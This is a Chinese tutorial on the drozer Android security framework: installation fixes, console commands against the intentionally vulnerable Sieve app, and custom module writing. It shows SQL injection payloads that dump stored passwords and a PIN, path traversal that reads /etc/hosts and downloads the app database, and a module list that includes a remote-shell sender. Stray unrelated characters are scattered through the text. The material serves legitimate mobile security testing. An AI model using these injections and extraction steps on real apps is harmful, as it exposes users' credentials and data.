簡(jiǎn)介
drozer官網(wǎng)
drozer github
drozer 是一款針對(duì) Android 系統(tǒng)的安全測(cè)試框架。
drozer 安裝
倆種安裝方式:
一枯怖、直接安裝,官網(wǎng)下載編譯好的 whl 文件直接安裝
二、編譯安裝抛寝,下載源碼編譯安裝
環(huán)境問(wèn)題 - 避免安裝遇到問(wèn)題,請(qǐng)檢查以下項(xiàng)
Python2.7 三顆星
Protobuf 2.6 or greater
Pyopenssl 16.2 or greater
Twisted 10.2 or greater
Java Development Kit 1.7 三顆星
Android Debug Bridge
直接安裝
- 下載最新的 drozer.whl 到本地,然后使用 python 方式安裝
sudo pip2 install drozer-2.4.4-py2-none-any.whl
下載 Agent.apk 并安裝到手機(jī)上盗舰,進(jìn)入該應(yīng)用 Embedded Server 選擇開(kāi)啟晶府,建立手機(jī)與 PC 的連接
建立端口號(hào)轉(zhuǎn)發(fā),drozer使用31415端口
adb forward tcp:31415 tcp:31415
- 連接 drozer 檢查是否成功
drozer console connect
結(jié)果如下所示:
$ > drozer console connect
Selecting 5ea648cc75e73af3 (Xiaomi Mi Note 3 8.1.0)
.. ..:.
..o.. .r..
..a.. . ....... . ..nd
ro..idsnemesisand..pr
.otectorandroidsneme.
.,sisandprotectorandroids+.
..nemesisandprotectorandroidsn:.
.emesisandprotectorandroidsnemes..
..isandp,..,rotectorandro,..,idsnem.
.isisandp..rotectorandroid..snemisis.
,andprotectorandroidsnemisisandprotec.
.torandroidsnemesisandprotectorandroid.
.snemisisandprotectorandroidsnemesisan:
.dprotectorandroidsnemesisandprotector.
drozer Console (v2.4.4)
dz>
直接安裝 Q & A
Q1
警告如下:
:0: UserWarning: You do not have a working installation of the service_identity module: 'No module named service_identity'. Please install it from <https://pypi.python.org/pypi/service_identity> and make sure all of its dependencies are satisfied. Without the service_identity module, Twisted can perform only rudimentary TLS client hostname verification. Many valid certificate/hostname mappings may be rejected.
A1
需要安裝service_identity钻趋,注意使用 pip 版本是2還是3川陆,drozer 使用的是 python2
pip install service_identity
安裝位置/usr/local/lib/python2.7/site-packages,需要依賴如下幾個(gè)包 attrs蛮位, pyOpenSSL >= 0.14 (0.12 and 0.13 may work but are not part of CI anymore)较沪, pyasn1, pyasn1-modules失仁, ipaddress on Python 2.7尸曼,具體參考
Q2
報(bào)錯(cuò)如下
drozer Server requires Twisted to run.
Run 'pip install twisted' to fetch this dependency.
A2
根據(jù)提示運(yùn)行 pip2 install twisted
重新運(yùn)行drozer console connect 進(jìn)入drozer 模式下
編譯安裝
推薦閱讀
https://github.com/mwrlabs/drozer
https://github.com/mwrlabs/drozer/wiki/Running-on-the-edge
安裝方式一
- 下載源碼
git clone https://github.com/mwrlabs/drozer/
- 切換到下載的 drozer 源碼目錄
cd drozer
- 編譯
python2 setup.py build
4.安裝
python2 setup.py install
安裝位置/usr/local/lib/python2.7/site-packages/drozer-2.4.3-py2.7.egg
后續(xù)java插件使用
java插件在drozer/src/drozer/modules/common中添加Test.java,如需使用可重復(fù)編譯安裝陶因,不影響之前安裝
python2 setup.py build
// 上一命令可不執(zhí)行骡苞,install 時(shí)會(huì)先構(gòu)建編譯
python2 setup.py install
其中python2 setup.py build之后生成三個(gè)文件+原先的Test.java,
Test.java
Test$test.class
Test.class
Test.apk
最終目標(biāo)使用Test.apk楷扬,只將 apk 放進(jìn)安裝位置中/usr/local/lib/python2.7/site-packages/drozer-2.4.3-py2.7.egg/drozer/modules/common
也可使用以下命令解幽,只生成 Test.apk 一個(gè)文件,然后拖進(jìn)安裝位置
make apks
安裝方式二
github 使用方式
git clone https://github.com/mwrlabs/drozer/
cd drozer
python2 setup.py bdist_wheel
cd dist
pip2 install drozer-2.4.3-py2-none-any.whl
安裝位置/usr/local/lib/python2.7/site-packages/drozer和/usr/local/lib/python2.7/site-packages/drozer-2.4.3.dist-info
后續(xù)java插件使用
java插件在drozer/src/drozer/modules/common中添加Test.java烘苹,可重復(fù)上述命令躲株,但不會(huì)覆蓋安裝,需要先卸載再安裝才能生效镣衡,推薦使用第一種方式霜定,簡(jiǎn)單一點(diǎn)
使用make apks只生成 apks,加載 java 不會(huì)成功廊鸥,關(guān)鍵是依靠 class 文件最終生成 apk進(jìn)行使用望浩,或者如下生成
javac -cp lib/android.jar dextest.java
dx --dex --output=dextest.apk dextest*.class
編譯安裝 Q&A
Q1
報(bào)錯(cuò)如下
/bin/sh: protoc: command not found?
A1
網(wǎng)上找了很多種方案,最后采用如下方式安裝
brew install grpc protobuf
Q2
報(bào)錯(cuò)如下:
UNEXPECTED TOP-LEVEL EXCEPTION:
com.android.dx.cf.iface.ParseException: bad class file magic (cafebabe) or version (0034.0000)
A2
分析: dx 的問(wèn)題
解決:修改Makefile文件惰说,將DX環(huán)境變量指向dorzer源代碼自帶的dx磨德,DX = $(CURDIR)/src/drozer/lib/dx ,其他javac吆视,NDKBUILD等環(huán)境變量按自己的系統(tǒng)環(huán)境指定
結(jié)果:無(wú)效典挑,因?yàn)橹岸际鞘褂?make命令整體安裝,如下, 一直報(bào)錯(cuò)不能向下進(jìn)行啦吧,比如 md5sum command no found或者make: dpkg: No such file or directory 等
// 安裝好drozer的Python依賴庫(kù)
$ easy_install -–allow-hosts pypi.python.org protobuf==2.4.1
$ easy_install twisted==10.2.0
git clone git://github.com/mwrlabs/drozer/
cd drozer
cp src/drozer/meta.py .
// 修改Makefile文件 將DX環(huán)境變量指向dorzer源代碼自帶的dx
// DX = $(CURDIR)/src/drozer/lib/dx
// 其他javac您觉,NDKBUILD等環(huán)境變量按自己的系統(tǒng)環(huán)境指定。
make
python setup.py install
分析:網(wǎng)上搜索是必須制定 java7
解決1:指定 Java 運(yùn)行環(huán)境授滓,在~/.drozer.config文件下 琳水,注意格式肆糕,但親測(cè)沒(méi)有用
[executables]
java = /Library/Java/JavaVirtualMachines/jdk1.7.0_80.jdk/Contents/Home/bin/java
javac = /Library/Java/JavaVirtualMachines/jdk1.7.0_80.jdk/Contents/Home/bin/javac
解決2:.bash_profile 配置環(huán)境變量,成功
使用
- 基本使用
- 模塊使用
- python 模塊
pythonb 編寫定制需要的測(cè)試模塊炫刷,擴(kuò)展drozer console的測(cè)試功能 - dex 模塊
java 編寫的 android 代碼擎宝,擴(kuò)展drozer agent的功能
- python 模塊
基本使用
官方文檔安裝使用說(shuō)明
官方測(cè)試 sieve.apk
1. 關(guān)鍵字查找包名
dz> run app.package.list -f sieve
com.mwr.example.sieve
查看所有安裝包 run app.package.list
2. 查看包信息
dz> run app.package.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Application Label: Sieve
Process Name: com.mwr.example.sieve
Version: 1.0
Data Directory: /data/user/0/com.mwr.example.sieve
APK Path: /data/app/com.mwr.example.sieve-z3nWTMbV0D6n2Ak5bB1Hvg==/base.apk
UID: 11069
GID: [3003]
Shared Libraries: null
Shared User ID: null
Uses Permissions:
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
- android.permission.INTERNET
Defines Permissions:
- com.mwr.example.sieve.READ_KEYS
- com.mwr.example.sieve.WRITE_KEYS
3. 攻擊面分析
查看四個(gè)組件是否能被其他應(yīng)用調(diào)用
dz> run app.package.attacksurface com.mwr.example.sieve
Attack Surface:
3 activities exported
0 broadcast receivers exported
2 content providers exported
2 services exported
is debuggable
4. 四大組件之 Activity
4.1 查看可被調(diào)用的 Activity
dz> run app.activity.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
com.mwr.example.sieve.FileSelectActivity
Permission: null
com.mwr.example.sieve.MainLoginActivity
Permission: null
com.mwr.example.sieve.PWList
Permission: null
4.2 啟動(dòng)可被調(diào)用的 Activity
run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
更多參數(shù)使用
dz> help app.activity.start
usage: run app.activity.start [-h] [--action ACTION] [--category CATEGORY [CATEGORY ...]]
[--component PACKAGE COMPONENT] [--data-uri DATA_URI]
[--extra TYPE KEY VALUE] [--flags FLAGS [FLAGS ...]]
[--mimetype MIMETYPE]
Starts an Activity using the formulated intent.
Examples:
Start the Browser with an explicit intent:
dz> run app.activity.start
--component com.android.browser
com.android.browser.BrowserActivity
--flags ACTIVITY_NEW_TASK
If no flags are specified, drozer will add the ACTIVITY_NEW_TASK flag. To launch
an activity with no flags:
dz> run app.activity.start
--component com.android.browser
com.android.browser.BrowserActivity
--flags 0x0
Starting the Browser with an implicit intent:
dz> run app.activity.start
--action android.intent.action.VIEW
--data-uri http://www.google.com
--flags ACTIVITY_NEW_TASK
For more information on how to formulate an Intent, type 'help intents'.
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, --help
--action ACTION specify the action to include in the Intent
--category CATEGORY [CATEGORY ...]
specify the category to include in the Intent
--component PACKAGE COMPONENT
specify the component name to include in the Intent
--data-uri DATA_URI specify a Uri to attach as data in the Intent
--extra TYPE KEY VALUE
add an field to the Intent's extras bundle
--flags FLAGS [FLAGS ...]
specify one-or-more flags to include in the Intent
--mimetype MIMETYPE specify the MIME type to send in the Intent
5. 四大組件之 Content Provider
5.1 查看可被訪問(wèn)的 Content Provider
dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Authority: com.mwr.example.sieve.DBContentProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.DBContentProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Path Permissions:
Path: /Keys
Type: PATTERN_LITERAL
Read Permission: com.mwr.example.sieve.READ_KEYS
Write Permission: com.mwr.example.sieve.WRITE_KEYS
Authority: com.mwr.example.sieve.FileBackupProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
分析:存在導(dǎo)出風(fēng)險(xiǎn),沒(méi)有導(dǎo)出風(fēng)險(xiǎn)如下提示
dz> run app.service.info -a com.xxxxx.sample
Package: com.xxxxx.sample
No exported services.
5.2 查看可被訪問(wèn)的 Content Provider 的 URI (數(shù)據(jù)泄露)
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
Unable to Query content://com.mwr.example.sieve.FileBackupProvider/
Unable to Query content://com.mwr.example.sieve.DBContentProvider
Able to Query content://com.mwr.example.sieve.DBContentProvider/Passwords/
Able to Query content://com.mwr.example.sieve.DBContentProvider/Keys/
Unable to Query content://com.mwr.example.sieve.FileBackupProvider
Able to Query content://com.mwr.example.sieve.DBContentProvider/Passwords
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
5.2 查看 URI 的數(shù)據(jù)信息
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
_id 1
service 1qazxsw23edcvfr4
username 1qazxsw23edcvfr4
password xLy+YA+alamO1WSy2lMhYCnxL+sHYWh3jSAWMaMhQdU= (Base64-encoded)
email
5.3 SQL 注入
5.3.1 查詢 app.provider.query
help app.provider.query
5.3.1.1 查看數(shù)據(jù)庫(kù)所有表信息
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
| type | name | tbl_name | rootpage | sql |
| table | android_metadata | android_metadata | 3 | CREATE TABLE android_metadata (locale TEXT) |
| table | Passwords | Passwords | 4 | CREATE TABLE Passwords (_id INTEGER PRIMARY KEY,service TEXT,username TEXT,password BLOB,email ) |
| table | Key | Key | 5 | CREATE TABLE Key (Password TEXT PRIMARY KEY,pin TEXT ) | |
5.3.1.2 查看單張表數(shù)據(jù)
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
| Password | pin |
| 1qazxsw23edcvfr4 | 9999 |
5.3.2 插入 app.provider.insert
5.3.3 更新 app.provider.update
5.3.4 刪除 app.provider.delete
以上使用通過(guò)幫助命令查看浑玛,eg: help app.provider.insert
5.3.4 下載數(shù)據(jù)庫(kù)到本地 app.provider.download
run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db .
5.3.5 讀取系統(tǒng)底層文件 app.provider.read
run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
5.4 檢查 ContentProvider 的安全性
5.4.1 檢測(cè)是否有 SQL注入
dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Not Vulnerable:
content://com.mwr.example.sieve.DBContentProvider/Keys
content://com.mwr.example.sieve.DBContentProvider/
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.DBContentProvider
content://com.mwr.example.sieve.FileBackupProvider
Injection in Projection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
5.4.2 檢查是否存在遍歷文件的漏洞
dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Not Vulnerable:
content://com.mwr.example.sieve.DBContentProvider/
content://com.mwr.example.sieve.DBContentProvider/Keys
content://com.mwr.example.sieve.DBContentProvider/Passwords/
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider
Vulnerable Providers:
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.FileBackupProvider
6. 四大組件之 Service
6.1 查看可使用的 services 命令
dz> run app.service.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
com.mwr.example.sieve.AuthService
Permission: null
com.mwr.example.sieve.CryptoService
Permission: null
分析: 存在風(fēng)險(xiǎn)绍申,沒(méi)有導(dǎo)出提示No exported services.
6.2 向服務(wù)發(fā)送信息
dz> run app.service.send com.example.srv com.example.srv.Service --msg 1 2 3 --extra float value 0.1324 --extra string test value
Did not receive a reply from com.example.srv/com.example.srv.Service.
7. 四大組件之 Broadcast
查看可以使用的 Broadcast
dz> run app.broadcast.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
No matching receivers.
8. drozer 命令檢測(cè)集合
app.activity.forintent Find activities that can handle the given intent
app.activity.info Gets information about exported activities.
app.activity.start Start an Activity
app.broadcast.info Get information about broadcast receivers
app.broadcast.send Send broadcast using an intent
app.broadcast.sniff Register a broadcast receiver that can sniff
particular intents
app.package.attacksurface Get attack surface of package
app.package.backup Lists packages that use the backup API (returns true
on FLAG_ALLOW_BACKUP)
app.package.debuggable Find debuggable packages
app.package.info Get information about installed packages
app.package.launchintent Get launch intent of package
app.package.list List Packages
app.package.manifest Get AndroidManifest.xml of package
app.package.native Find Native libraries embedded in the application.
app.package.shareduid Look for packages with shared UIDs
app.provider.columns List columns in content provider
app.provider.delete Delete from a content provider
app.provider.download Download a file from a content provider that supports
files
app.provider.finduri Find referenced content URIs in a package
app.provider.info Get information about exported content providers
app.provider.insert Insert into a Content Provider
app.provider.query Query a content provider
app.provider.read Read from a content provider that supports files
app.provider.update Update a record in a content provider
app.service.info Get information about exported services
app.service.send Send a Message to a service, and display the reply
app.service.start Start Service
app.service.stop Stop Service
auxiliary.webcontentresolver
Start a web service interface to content providers.
exploit.jdwp.check Open @jdwp-control and see which apps connect
exploit.pilfer.general.apnprovider
Reads APN content provider
exploit.pilfer.general.settingsprovider
Reads Settings content provider
information.datetime Print Date/Time
information.deviceinfo Get verbose device information
information.permissions Get a list of all permissions used by packages on the
device
intents.fuzzinozer fuzzinozer
scanner.activity.browsable Get all BROWSABLE activities that can be invoked from
the web browser
scanner.misc.checkjavascriptbridge
Check if addJavascriptInterface is used and can be
abused
scanner.misc.native Find native components included in packages
scanner.misc.readablefiles Find world-readable files in the given folder
scanner.misc.secretcodes Search for secret codes that can be used from the
dialer
scanner.misc.sflagbinaries Find suid/sgid binaries in the given folder (default
is /system).
scanner.misc.writablefiles Find world-writable files in the given folder
scanner.provider.finduris Search for content providers that can be queried from
our context.
scanner.provider.injection Test content providers for SQL injection
vulnerabilities.
scanner.provider.sqltables Find tables accessible through SQL injection
vulnerabilities.
scanner.provider.traversal Test content providers for basic directory traversal
vulnerabilities.
shell.exec Execute a single Linux command.
shell.send Send an ASH shell to a remote listener.
shell.start Enter into an interactive Linux shell.
simple.attack.activity Gets information about exported activities then start
them
tools.file.download Download a File
tools.file.md5sum Get md5 Checksum of file
tools.file.size Get size of file
tools.file.upload Upload a File
tools.setup.busybox Install Busybox.
tools.setup.minimalsu Prepare 'minimal-su' binary installation on the device.
模塊使用
python 模塊
流程:創(chuàng)建模塊倉(cāng)庫(kù) -> 編寫模塊 -> 安裝模塊 -> 運(yùn)行模塊
1. 創(chuàng)建模塊倉(cāng)庫(kù)
- 方式一
在 drozer console 中創(chuàng)建 repositories 文件夾作為倉(cāng)庫(kù)
# !bash
dz> module repository create [/absolute_path/repositories]
- 方式二
在~/.drozer_config中指定倉(cāng)庫(kù)
[repositories]
/absolute_path/repositories = /absolute_path/repositories
2.編寫模塊
以 官方Demo為例,編寫 GetInteger.py 文件顾彰,代碼如下
#!python
from drozer.modules import Module
class GetInteger(Module):
name = ""
description = ""
examples = ""
author = "Joe Bloggs (@jbloggs)"
date = "2012-12-21"
license = "BSD (3-clause)"
path = ["exp", "random"]
def execute(self, arguments):
random = self.new("java.util.Random")
integer = random.nextInt()
self.stdout.write("int: %d\n" % integer)
說(shuō)明
name 模塊的名稱
description 模塊的功能描述
examples 模塊的使用示例
author 作者
date 日期
license 許可
path 描述模塊命令空間
其中path = ["exp", "test"],類型為 GetInteger极阅,模塊以exp.random.getinteger 唯一確定
3.安裝模塊
方式一
采用python包管理方式,在 repositories 目錄下創(chuàng)建目錄 exp涨享,新建 ini.py 空白文件筋搏,然后將模塊(即上述GetInteger.py文件)放入 exp 目錄中即可方式二
在 drozer console 中使用 module install 命令安裝,將編號(hào)的 python 模塊源文件命名為 getintegerbefore.getintegerafter,在 drozer console 中執(zhí)行
# !bash
dz> module install [/path/repositories]
在repositories倉(cāng)庫(kù)下回生成 getintegerbefore文件夾厕隧,文件夾下包含 init.py 和 getintegerafter.py 倆個(gè)文件
絕對(duì)路徑和相對(duì)路徑均可奔脐,推薦絕對(duì)路徑
- 安裝遠(yuǎn)程模塊
安裝 mwr labs github 提供的模塊,例如
#!bash
dz>module install jubax.javascript
3.運(yùn)行模塊
在 drozer console 中運(yùn)行模塊吁讨,執(zhí)行
# !bash
dz> run exp.random.getinteger
int: 261603234
- 和路徑無(wú)關(guān)
- 不區(qū)分大小寫
- 只與文件中聲明的 path (eg: path = ["ex", "random"])和類(eg: GetInteger)名有關(guān)髓迎,最后為
exp.random.getinteger,不過(guò)建議和路徑保持一致,防止出現(xiàn)錯(cuò)誤退出
異常問(wèn)題建丧,沒(méi)有錯(cuò)誤日志信息排龄,直接退出 drozer,我的天t嶂臁橄维!如 Path 重復(fù)
如果文件中有漢字,注意保存格式為 UTF-8 with BOM拴曲,否則直接退出 drozer
dex 模塊
流程:編寫 java 插件代碼 -> 安裝 java 插件 -> 編寫 python 模塊驗(yàn)證
1.編寫 java 插件代碼
例如如下代碼
import android.content.Intent;
import android.content.Context;
import java.io.Serializable;
public class IntentTest {
public static class test implements Serializable {
}
public static boolean superfuzz_Activity(Context context ,String package_params, String compoment_params ){
Intent intent = new Intent();
intent.setClassName( package_params , compoment_params);
intent.putExtra("serializable_key",new test());
intent.setFlags(0x10000000);
context.startActivity(intent);
return true;
}
}
2.安裝插件
根絕上方安裝 drozer 時(shí)的方式争舞,選擇之前對(duì)應(yīng)的“后續(xù)使用”方式
3.編寫 python 模塊驗(yàn)證
根據(jù)上方“python 模塊”步驟編寫安裝 python 模塊
# !python
from drozer.modules import common, Module
class TestIntent(Module,common.ClassLoader):
name = ""
description = ""
examples = ""
author = ""
date = ""
license = ""
path = ["exp", "test"]
def execute(self, arguments):
TestIntent = self.loadClass("common/IntentTest.apk", "TestIntent")
TestIntent.superfuzz_Activity(self.getContext(),"com.xxx.xxx","com.xxx.xxx.MainActivity")
注意:?jiǎn)?dòng)該 MainActivity 類問(wèn)題
- android:exported="true" 屬性
Caused by: java.lang.SecurityException: Permission Denial: starting Intent
- 在AndroidManifest.xml中聲明,并且啟動(dòng)代碼包名和類名必須按照如下格式
包名:com.xxx.xxx
類名:com.xxx.xxx.MainActivity
Intent intent = new Intent();
intent.setClassName("com.simple.hookapp", "com.simple.hookapp.MainActivity");
startActivity(intent);
Caused by: android.content.ActivityNotFoundException: Unable to find
explicit activity class {com.xxx.xxx/MainFragmentActivity};
have you declared this activity in your AndroidManifest.xml?
在 drozer console下運(yùn)行驗(yàn)證
#!bash
dz> run exp.test.testintent
調(diào)試運(yùn)行
1. 在 debug 模式下運(yùn)行 drozer
drozer console connect --debug
2. 修改插件后澈灼,然后重新加載
dz> reload
關(guān)于失效的問(wèn)題兑障,采取該方案
在/drozer/src/drozer/console/session.py 路徑下找到 session 文件,并找到下面代碼進(jìn)行修改
#!python
def __module(self, key):
"""
Gets a module instance, by identifier, and initialises it with the
required session parameters.
"""
module = None
try:
module = self.modules.get(self.__module_name(key))
except KeyError:
pass
if module == None:
try:
module = self.modules.get(key)
except KeyError:
pass
if module == None:
raise KeyError(key)
else:
# reload module
# 注釋原先上面一行代碼蕉汪,修改為下方代碼
mod = reload(sys.modules[module.__module__])
module_class_name = module.__name__
module_class = getattr(mod,module_class_name) #get module class object
return module_class(self)
然后重新構(gòu)建安裝 drozer,或者直接在安裝位置修改/usr/local/lib/python2.7/site-packages/drozer-2.4.3-py2.7.egg/drozer/console/session.py
3. 重新運(yùn)行
dz> run xx.xx.xx
在線檢測(cè)工具
來(lái)自 http://www.reibang.com/p/81bc16a7ac67
騰訊金剛審計(jì)系統(tǒng) http://service.security.tencent.com/kingkong 免費(fèi) 無(wú)限制
騰訊御安全 http://yaq.qq.com/ 免費(fèi) 查看漏洞詳情需認(rèn)證
阿里聚安全 http://jaq.alibaba.com/ 免費(fèi) 查看漏洞詳情需認(rèn)證
360顯微鏡 http://appscan.#/ 免費(fèi) 無(wú)限制
360APP漏洞掃描 http://dev.#/html/vulscan/scanning.html 免費(fèi) 無(wú)限制
百度MTC http://mtc.baidu.com 9.9元/次 無(wú)限制
梆梆 https://dev.bangcle.com 免費(fèi) 無(wú)限制
愛(ài)內(nèi)測(cè) http://www.ineice.com/ 免費(fèi) 無(wú)限制
通付盾 http://www.appfortify.cn/ 免費(fèi) 無(wú)限制
NAGA http://www.nagain.com/appscan/ 免費(fèi) 無(wú)限制
GES審計(jì)系統(tǒng) http://01hackcode.com/ 免費(fèi) 無(wú)限制
盤古出品的Janeushttp://appscan.io
Janus http://cloud.appscan.io
APP逆向main_classify_list https://android.fallible.co/
java在線反編譯Java decompiler online http://www.javadecompilers.com
騰訊電腦管家:哈勃 http://habo.qq.com/
騰訊TSRC:金剛 http://service.security.tencent.com/
阿里聚安全:http://jaq.alibaba.com/
西安交通大學(xué) sanddroid:http://sanddroid.xjtu.edu.cn/#home
金山火眼:http://fireeye.ijinshan.com/analyse.html
瀚海源文件B超:https://b-chao.com
參考資料
謝謝以下作者的文章
https://testerhome.com/topics/2209/show_wechat
https://juejin.im/post/5aa1191c6fb9a028d936be30
http://ju.outofmemory.cn/entry/170782
http://www.lynnshare.cc/article/?id=36
http://blog.0kami.cn/2016/08/20/old-how-to-install-drozer-on-mac/
